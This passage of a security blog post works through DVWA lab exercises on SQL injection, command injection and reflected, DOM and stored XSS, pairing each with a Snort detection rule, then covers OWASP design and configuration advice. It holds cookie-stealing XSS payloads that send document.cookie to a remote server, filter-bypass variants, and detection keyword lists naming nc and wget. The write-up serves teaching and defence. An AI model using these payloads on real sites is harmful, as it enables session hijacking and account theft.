thus providing protection against injection attacks.<\/p>\n\n\n\n<p>Below is the Snort rule I created to help detect SQL Injections.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"SnortSQL\"><strong>Snort rule to detect SQL Injections<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># The rule below was used, tested, and tailored to Low Difficulty on DVWA\n\n# Rule can be further enhanced by adding quotation variants and additional symbols and SQL commands. \n# If source code\/normal traffic contains some SQL Commands, you can take it off to get rid of the false positives. ie. I took off \"LIKE\" # for the High Difficulty.\n# I also had to get rid of \"=\" or \"%3D\", and the SQL commands SELECT, and FROM on specific difficulties. \n# You can adjust the URI content as needed. I had to remove \"(^|&amp;)?id=&#91;^&amp;]*?\" for the Medium and High difficulty.\n\nalert tcp any any -&gt; any 80 (\\\nmsg: \"SQL Injection detected - \/vulnerabilities\/sqli\";\\\nsid: 1000024;\\\nuricontent: \"\/vulnerabilities\/sqli\/?id=\"; nocase;\\\npcre:\"\/(^|&amp;)?id=&#91;^&amp;]*?(%20|%22|%23|%27|%3B|%3C|%3D|%3E|%7C|\\b(?:UNION|AND|OR|SELECT|NULL|CONCAT|FROM|EXEC|IF|SLEEP|CONVERT|HAVING|INSERT|UPDATE|DELETE|DROP|CREATE|CAST|LIKE|IN)\\b|--)\/im\"; nocase;\\\n)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>The second Injection I want to bring up is a variant of SQL Injection known as Blind SQL Injection. Besides the changes in msg, SID, rev, and URL, the rules are the same. <\/p>\n\n\n\n<p>Blind SQL Injection has 2 different methods. One is the Boolean method, which we can see in DVWA: after entering an existing ID, the server will let us know. This is our TRUE.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"343\" height=\"127\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLBooleanTruth.png\" alt=\"\" class=\"wp-image-922\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLBooleanTruth.png 343w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLBooleanTruth-300x111.png 300w\" sizes=\"(max-width: 343px) 100vw, 343px\" \/><\/figure>\n\n\n\n<p>When inputting something that doesn&#8217;t exist, it&#8217;ll tell us that it&#8217;s missing. This is our FALSE.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"648\" height=\"336\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQKLBooleanFalse.png\" alt=\"\" class=\"wp-image-923\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQKLBooleanFalse.png 648w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQKLBooleanFalse-300x156.png 300w\" sizes=\"(max-width: 648px) 100vw, 648px\" \/><\/figure>\n\n\n\n<p>The second is the sleep method, which you would usually see when the website doesn\u2019t return an error. In the picture above, in the bottom left corner, I use a sleep command. The injection was successful if we told the website to sleep for 5 seconds in our query. If the response time isn\u2019t long, the injection isn\u2019t successful.<\/p>\n\n\n\n<p>I won\u2019t dive deep into this one, as the mitigations and examples are the same as the normal injections. These two methods are usually automated with SQL Map or a custom script.<\/p>\n\n\n\n<p>Another great resource for learning Web Security and practicing your scripting is NATS by OverTheWire. Here\u2019s a little script of mine and its output that is related to a blind SQL injection. Here I was abusing the boolean method to find out which characters were present in the password for the next room, then slowly put a string together, revealing the full password.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"865\" height=\"813\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLScript.png\" alt=\"\" class=\"wp-image-924\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLScript.png 865w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLScript-300x282.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLScript-768x722.png 768w\" sizes=\"(max-width: 865px) 100vw, 865px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Below is the rule to help detect blind SQL Injections. Again, it&#8217;s the same as the normal SQL Injection.<\/p>\n\n\n\n<p id=\"BlindSQL\"><strong>Snort rule to detect blind SQL Injection<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Follow the same notes as brought up in the normal SQL Injection\n\nalert tcp any any -&gt; any 80 (\\\nmsg: \"SQL Blind Injection detected - \/vulnerabilities\/sqli_blind\";\\\nsid: 1000025;\\\nuricontent: \"\/vulnerabilities\/sqli_blind\/?id=\"; nocase;\\\npcre:\"\/(^|&amp;)?id=&#91;^&amp;]*?(%20|%22|%23|%27|%3B|%3C|%3D|%3E|%7C|\\b(?:UNION|AND|OR|SELECT|NULL|CONCAT|FROM|EXEC|IF|SLEEP|CONVERT|HAVING|INSERT|UPDATE|DELETE|DROP|CREATE|CAST|LIKE|IN)\\b|--)\/im\"; nocase;\\\n)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>Now, moving away from databases, we\u2019re looking at our third section: command injection. These are known as remote code execution, and their commands can vary. The rule will contain examples that can be picked up on Linux and Windows Command Injection.<\/p>\n\n\n\n<p>Starting with the low-difficulty DVWA, we\u2019re asked to enter an IP address to ping. We can simply add \u201c&amp;&amp;\u201d and the command we want after it. As well as a semicolon.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"521\" height=\"306\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComLow.png\" alt=\"\" class=\"wp-image-927\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComLow.png 521w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComLow-300x176.png 300w\" sizes=\"(max-width: 521px) 100vw, 521px\" \/><\/figure>\n\n\n\n<p>As for medium difficulty, the developer has created a small blacklist to prevent the use of commands in low difficulty. In this case, we can use the \u201c&amp;\u201d symbol to run the ping command in the background.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"521\" height=\"262\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComMed.png\" alt=\"\" class=\"wp-image-928\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComMed.png 521w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComMed-300x151.png 300w\" sizes=\"(max-width: 521px) 100vw, 521px\" \/><\/figure>\n\n\n\n<p>Then, finally, for the High Difficulty, the developer added more items to the blacklist but had a typo for the \u201c|\u201d symbol. This allows us to run the command shown below.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"477\" height=\"168\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComHigh.png\" alt=\"\" class=\"wp-image-929\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComHigh.png 477w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComHigh-300x106.png 300w\" sizes=\"(max-width: 477px) 100vw, 477px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>DVWA\u2019s impossible difficulty has it so that there are multiple validation checks to ensure that an IP address is being passed in.<\/p>\n\n\n\n<p id=\"SnortCommand\"><strong>Snort rule to detect Command Injections<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># It can be improved by making it so that the keywords are detected when there is no space to their left. Although this is a weakness, the Symbols can help in detection. Some fixes will only lead to more false positives.\n# Adjust URL, Addresses, and add additional keywords as seen fit.\n\nalert tcp any any -> any 80 (\\\nmsg: \"Command Injection detected - \/vulnerabilities\/exec\";\\\nsid: 1000023;\\\nuricontent: \"\/vulnerabilities\/exec\"; nocase;\\\npcre:\"(%26|%2A|%3B|%3C|%3E|%3F|%60|%7C|\\b(?:CMD|BASH|SH|POWERSHELL|ECHO|NC|WGET|UNAME|CD|LS|DIR|WHOAMI|IFCONFIG|ID|HOSTNAME|IPCONFIG|CAT|TAIL|HEAD|CHMOD)\\b.*?|--)\/im\";\n)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>Reflected XSS is the 4th injection I will bring up.<\/strong><\/p>\n\n\n\n<p>Reflected XSS is usually initiated after a social engineering attack. So, for example, if a bank website has this vulnerability, a malicious link can be sent to a victim that will trigger a specially crafted request to the website. Let\u2019s say that the crafted request aims to get the victim\u2019s cookie. If the attack is successful, the attacker can get into the victim\u2019s account using the cookie.<\/p>\n\n\n\n<p>We can see some examples of this through DVWA. <\/p>\n\n\n\n<p>The Low difficulty for the Reflected XSS section is just an input field asking for your name. The source code does not check or validate user input. The overall objective of this section in DVWA is to get a user\u2019s cookie and hijack their session.<\/p>\n\n\n\n<p>We can set up a remote server to receive the data generated by the script below. The remote server in this case is just a Python HTTP server.<\/p>\n\n\n\n<p>&lt;script&gt;window.location=\u2019http:\/\/172[.]16[.]0[0]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"414\" height=\"235\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefScript.png\" alt=\"\" class=\"wp-image-947\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefScript.png 414w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefScript-300x170.png 300w\" sizes=\"(max-width: 414px) 100vw, 414px\" \/><\/figure>\n\n\n\n<p>The output from the remote server is shown below. In this scenario, the attacker has the victim\u2019s cookie and can use it to hijack their session.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"598\" height=\"82\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefResp.png\" alt=\"\" class=\"wp-image-948\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefResp.png 598w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefResp-300x41.png 300w\" sizes=\"(max-width: 598px) 100vw, 598px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>While performing this injection, Snort was also running and detected the XSS reflection attack.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"732\" height=\"89\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowRefSnort-1.png\" alt=\"\" class=\"wp-image-950\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowRefSnort-1.png 732w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowRefSnort-1-300x36.png 300w\" sizes=\"(max-width: 732px) 100vw, 732px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The medium-difficulty source code is looking for any instance of \u201cscript\u201d, but it can be exploited using the script shown below. The reason why it works is that it\u2019s case-sensitive. We can just capitalize \u201cscript\u201d. The Snort rule will also activate, and the remote session will receive the victim&#8217;s cookie.<\/p>\n\n\n\n<p>&lt;SCRIPT&gt;&lt;SCRIPTwindow.location=\u2019http:\/\/172[.]16[.]0[0]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"386\" height=\"84\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medrefScript.png\" alt=\"\" class=\"wp-image-951\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medrefScript.png 386w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medrefScript-300x65.png 300w\" sizes=\"(max-width: 386px) 100vw, 386px\" \/><\/figure>\n\n\n\n<p>The High difficulty has removed the \u201cscript\u201d pattern. We can exploit HTML Events using the script below. The Snort rule will also detect this, and the remote server will receive the victim&#8217;s cookie.<\/p>\n\n\n\n<p>&lt;img src\/onerror=\u201dvar cook = document.cookie; document.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + cook\u201d&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"416\" height=\"123\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highRefScript.png\" alt=\"\" class=\"wp-image-952\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highRefScript.png 416w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highRefScript-300x89.png 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" \/><\/figure>\n\n\n\n<p>For the impossible mode, it uses &#8220;htmlspecialchars()&#8221;, which looks for special characters like &#8220;&gt;&#8221; and &#8220;&lt;&#8221; and turns them into &#8220;&amp;lt&#8221; and &#8220;&amp;gt&#8221;. This helps prevent input from being interpreted by the browser as malicious code.<\/p>\n\n\n\n<p id=\"SnortReflected\"><strong>Snort rule to detect Reflected XSS<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>alert tcp any any -&gt; any 80 (\\\nmsg: \"XSS Reflection  Injection detected - \/vulnerabilities\/xss_r\";\\\nsid: 1000030;\\\nuricontent: \"\/vulnerabilities\/xss_r\/?name=\"; nocase;\\\npcre:\"\/(^|&amp;)?id=&#91;^&amp;]*?(%21|%26|%27|%28|%29|%2A|%2D|%2E|%2F|%3B|%3C|%3D|%3E|%60|%7C|\\b(?:EVAL|UNESCAPE|ATOB|IMG|SRC|ONERROR|ALERT|PARAMETER|VALUE|DOCUMENT.COOKIE|DOCUMENT.LOCATION|DOCUMENT|PROMPT|CONFIRM|ONLOAD|ONMOUSEOVER|SCRIPT)\\b|--)\/im\"; nocase;\\\n)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p><strong>The Fifth Injection is DOM XSS.<\/strong><\/p>\n\n\n\n<p>For this injection, the user clicks on a specially crafted malicious link. The request will be sent to the web server, but the script will only run on the client side. The way that the website loads will be affected by the script, so this XSS is client-sided.<\/p>\n\n\n\n<p>In this section of DVWA, we are given a drop-down menu to select the user&#8217;s language.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"236\" height=\"121\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/RoomPic.png\" alt=\"\" class=\"wp-image-973\"\/><\/figure>\n\n\n\n<p>Instead of entering our script in an input field, we will have to enter it in the URL. Initially, the URL will look like this\u2026 It\u2019s just a path.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"295\" height=\"47\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/domPath.png\" alt=\"\" class=\"wp-image-974\"\/><\/figure>\n\n\n\n<p>But after clicking on the &#8220;Select&#8221; button, the URL will be updated. Now we can replace &#8220;English&#8221; with our scripts.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"347\" height=\"59\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/domPathUpdated.png\" alt=\"\" class=\"wp-image-975\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/domPathUpdated.png 347w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/domPathUpdated-300x51.png 300w\" sizes=\"(max-width: 347px) 100vw, 347px\" \/><\/figure>\n\n\n\n<p>In the Low difficulty of this section, it will not check\/validate the input. Use the script below to connect to a remote server and collect the victim&#8217;s cookie.<\/p>\n\n\n\n<p>default=&lt;script&gt;window.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"759\" height=\"150\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDOMURL.png\" alt=\"\" class=\"wp-image-955\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDOMURL.png 759w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDOMURL-300x59.png 300w\" sizes=\"(max-width: 759px) 100vw, 759px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Below is an image showing what the remote server will see from the script used above.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"599\" height=\"184\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDom.png\" alt=\"\" class=\"wp-image-956\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDom.png 599w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDom-300x92.png 300w\" sizes=\"(max-width: 599px) 100vw, 599px\" \/><\/figure>\n\n\n\n<p>We can take that cookie, inspect the page, and replace our current cookie with the victim&#8217;s cookie to hijack their session.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"718\" height=\"329\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMCookie.png\" alt=\"\" class=\"wp-image-957\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMCookie.png 718w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMCookie-300x137.png 300w\" sizes=\"(max-width: 718px) 100vw, 718px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Below is the switch from Unknown to the Admin user.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"358\" height=\"262\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMAdmin.png\" alt=\"\" class=\"wp-image-958\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMAdmin.png 358w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMAdmin-300x220.png 300w\" sizes=\"(max-width: 358px) 100vw, 358px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>For the medium difficulty of this section, the source code will remove the usage of &#8220;script&#8221;. Just like how we did in the reflective XSS, we can use HTML events.<\/p>\n\n\n\n<p> English&lt;\/select&gt;&lt;img src\/onerror=\u201dvar cook = document.cookie; document.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + cook\u201d&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"725\" height=\"77\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOMUrl.png\" alt=\"\" class=\"wp-image-959\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOMUrl.png 725w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOMUrl-300x32.png 300w\" sizes=\"(max-width: 725px) 100vw, 725px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Again, this is the output on the remote server after running that script.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"597\" height=\"114\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOM.png\" alt=\"\" class=\"wp-image-960\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOM.png 597w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOM-300x57.png 300w\" sizes=\"(max-width: 597px) 100vw, 597px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>For the high difficulty in this section, the source code whitelisted the options shown in the drop-down menu.<\/p>\n\n\n\n<p>Though we\u2019re able to add in our script after the path, followed by a \u201c#\u201d.<\/p>\n\n\n\n<p>?#default=&lt;script&gt;window.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"716\" height=\"107\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDomurl.png\" alt=\"\" class=\"wp-image-961\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDomurl.png 716w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDomurl-300x45.png 300w\" sizes=\"(max-width: 716px) 100vw, 716px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>This will once again send the victim cookie to the remote server.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"593\" height=\"86\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDom.png\" alt=\"\" class=\"wp-image-962\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDom.png 593w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDom-300x44.png 300w\" sizes=\"(max-width: 593px) 100vw, 593px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>In impossible mode, it relies on the browser to perform the proper encoding when making requests.<\/p>\n\n\n\n<p id=\"SnortDOM\"><strong>Snort rule to detect DOM XSS<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Did not work on High, as anything after the # is not sent to the server\n\nalert tcp any any -&gt; any 80 (\\\nmsg: \"XSS DOM Injection detected - \/vulnerabilities\/xss_d\";\\\nsid: 1000031;\\\nuricontent: \"\/vulnerabilities\/xss_d\/?default=\"; nocase;\\\npcre:\"\/(^|&amp;)?default=&#91;^&amp;]*?(%26|%27|%28|%29|%2A|%2D|%2E|%3B|%3C|%3D|%3E|%60|%7C|\\b(?:EVAL|IMG|SRC|ONERROR|ALERT|VALUE|DOCUMENT.COOKIE|DOCUMENT.LOCATION|DOCUMENT|DOCUMENT.WRITE|DOCUMENT.CREATEELEMENT|ONLOAD|ONMOUSEOVER|ONERROR|SCRIPT|ELEMENT.ADDEVENTLISTENER|GETELEMENTBYID|INNERHTML|SETATTRIBUTE|ELEMENT.INNERHTML|ELEMENT.SETATTRIBUTE|HISTORY|PUSHSTATE|HISTORY.REPALCESTATE)\\b|--)\/im\"; nocase;\\\n\n)<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<p>The sixth Injection I\u2019ll bring up is stored XSS.<\/p>\n\n\n\n<p>This XSS is not like the others, which only run once. When this vulnerability is exploited, the script will persist on the web server and run whenever other victims visit the affected website.<\/p>\n\n\n\n<p>This section in DVWA is just a guestbook that asks visitors to enter their name and a message. The goal is to redirect victims to another webpage. I only used alerts on this one, but you can use the scripts from the other XSS attacks to redirect to a different page.<\/p>\n\n\n\n<p>Inside DVWA Low, the input will not be validated.<\/p>\n\n\n\n<p>In the message box, you can put the script below. You can place anything in the name field.<\/p>\n\n\n\n<p>&lt;script&gt;window.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>For Medium difficulty, the source code tried to add protection for the message field.<\/p>\n\n\n\n<p>Inspect the page, and change the name input size from 10 to 100.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"667\" height=\"482\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedStoredScript.png\" alt=\"\" class=\"wp-image-965\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedStoredScript.png 667w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedStoredScript-300x217.png 300w\" sizes=\"(max-width: 667px) 100vw, 667px\" \/><\/figure>\n\n\n\n<p>This will allow you to put the code in the name field. It won&#8217;t work if you attempt to run it in the message field.<\/p>\n\n\n\n<p>&lt;sc&lt;script&gt;ript&gt;window.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<p>Can try&nbsp;<\/p>\n\n\n\n<p>&lt;img src\/onerror=\u201dvar cook = document.cookie; document.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + cook\u201d&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"446\" height=\"242\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medstoredalt.png\" alt=\"\" class=\"wp-image-966\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medstoredalt.png 446w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medstoredalt-300x163.png 300w\" sizes=\"(max-width: 446px) 100vw, 446px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>For the high difficulty, the source code adds protection in both fields.<\/p>\n\n\n\n<p>We can use the HTML events. Put the code in the name field, and you can put a random message.<\/p>\n\n\n\n<p>Inspect the page, and change the name input size from 10 to 100. Use the script below.<\/p>\n\n\n\n<p>&lt;img src\/onerror=\u201dvar cook = document.cookie; document.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + cook\u201d&gt;<\/p>\n\n\n\n<p> The impossible mode uses &#8220;htmlspecialchars()&#8221; to help prevent XSS attacks.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"SnortStored\"><strong>Snort rule to detect Stored XSS<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>#This rule will activate the very first time the stored xss happens. Will not activate when visitors visit and are affected.\n\nalert tcp any any -&gt; any 80 (\\\nmsg: \"XSS Stored Injection detected - \/vulnerabilities\/xss_s\";\\\nsid: 1000032;\\\nuricontent: \"\/vulnerabilities\/xss_s\/\"; nocase;\\\npcre:\"\/(^|&amp;)?id=&#91;^&amp;]*?(%22|%26|%27|%28|%29|%2D|%2E|%2F|%3B|%3C|%3D|%3E|%5C|%60|%7C|\\b(?:EVAL|UNESCAPE|ATOB|IMG|SRC|ALERT|VALUE|DOCUMENT.COOKIE|DOCUMENT.LOCATION|DOCUMENT|&amp;LT|&amp;GT|&amp;AMP|&amp;QUOT|PROMPT|CONFIRM|ONLOAD|ONMOUSEOVER|ONERROR|ONBLUR|ONFOCUS|ONMOUSEDOWN|HREF|BACKGROUND|SCRIPT)\\b|--)\/im\"; nocase;\\\n)<\/code><\/pre>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"InsecureDesign\">4. Insecure Design<\/h3>\n\n\n\n<p>This category can be confusing, but it means there should be more thinking during the design phase. Using things like a secure development lifecycle, continuous threat modeling, and following security principles.<\/p>\n\n\n\n<p>It does not have foresight into which threats or vulnerabilities may arise once something is launched. An example is when the HTTP protocol was created. Security was not a concern, as it was used on private academic, research, and government networks. But as the internet grew and went public, the lack of encryption quickly became a security flaw.<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"SecMisConf\">5. Security Misconfiguration<\/h3>\n\n\n\n<p>Now, for this section, I usually have three big things come to mind, though there are 20 CWEs mapped to it.<\/p>\n\n\n\n<p>With the first one being debloating your workstation or server. This means removing anything unnecessary from the system. This will help reduce the attack surface of that device, giving the attacker fewer opportunities to exploit it.<\/p>\n\n\n\n<p>This is not just applications and services. It can be Ports, accounts, and privileges. If you are running a web server, you must review plugins and any additional directories\/pages that may exist by default. The last thing you\u2019ll want is a compromise via an XSS through an old chat room plugin built into your web server folders.<\/p>\n\n\n\n<p>The second is system hardening. Most systems\/servers do not come pre-hardened, and organizations need to do so to maintain compliance with regulations and industry standards. Most organizations already have this automated, but a good resource for hardening is the Center for Internet Security (CIS) Benchmarks.<\/p>\n\n\n\n<p>They create benchmarks, which are comprehensive manuals that help people and organizations secure and harden their systems. This can be Linux servers, workstations, Windows servers, cloud instances, and many more. They\u2019re extremely comprehensive and can reach the thousand-page mark.<\/p>\n\n\n\n<p>The third one is showing too much information. An example is when you try to access a specific page on my web server that doesn\u2019t exist, and the 404 error page appears, revealing the exact version and type of server running. This helps the attacker narrow down their search for exploits specific to that version.<\/p>\n\n\n\n<p>This can be mitigated by simply removing the error message or putting a different 404 page\/message.<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"vulnComp\">6. Using Vulnerable and Outdated Components<\/h3>\n\n\n\n<p>Legacy servers and applications are (sadly) common in most companies. These are usually critical systems that have not been upgraded or migrated to secure, maintained versions. Reasons can include complexity, specific applications not being supported in upgrades, cost, or all of the above.<\/p>\n\n\n\n<p>For these types of systems, you have to make sure they are hardened, debloated, monitored, and, if possible, scanned for vulnerabilities occasionally and patched. Sometimes, scanning may not be an option as it can bring the system down. They will also have to be placed on their own VLAN.<\/p>\n\n\n\n<p>It is important to follow these security measures, as it is extremely easy for someone to exploit these systems, given that database exploits are readily and publicly available.<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained 